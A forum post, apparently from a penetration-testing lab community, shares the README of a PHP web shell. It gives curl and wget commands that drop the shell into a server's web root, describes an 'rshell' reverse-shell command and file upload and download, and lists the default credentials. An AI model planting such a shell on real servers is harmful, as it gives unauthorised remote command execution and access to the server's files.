PHP Web Shell

Sooo, I am getting a bit exhausted with people’s reverse shells crashing boxes (also shuffling through them to find one that works). Here is a nice web shell that gives you a terminal like page to execute basic commands from. It’s not a TRUE reverse shell but it is good enough for most of the things you will do here at least. Enjoy,


php-shell

A simple, intuitive, feature rich, php web shell for pen testing.

Usage

To download use one of the following (or similar)

curl https://github.com/eb3095/php-shell/raw/master/php-shell.php > /var/www/html/php-shell.php
wget https://github.com/eb3095/php-shell/raw/master/php-shell.php -O /var/www/html

From there just visit the website with /php-shell.php at the end and enjoy your web based shell from the host!

Controls

  • Arrow Up: History up
  • Arrow Down: History down
  • Enter: Run command
  • Click Anywhere: Focus command prompt

History is not saved across sessions and is stored locally in the browser for the time being.

Commands

  • exit: Log out
  • cd: Change directory
  • cls: Clear the screen
  • rshell: “rshell IP PORT” open a remote shell to the specified address
  • upload: Shows a file prompt then uploads the file to the current directory
  • download: Download a file either relative path or full. “download FILE”

cd is unique here. If you do the following,

cd /home; ls

This will be executed as a SH/BASH command. The cd will not set the current working directory outside of the exec. However,

cd /home

This will be executed as an internal command setting the PHP cwd and it is permanent (until refresh).

Credentials

The defaults are,

  • Username: user
  • Password: pass

The username and password are both hashed via sha512 and set in the file directly.

Screenshot

Thank you

Nice, thanks mate, I will try that one out :slight_smile: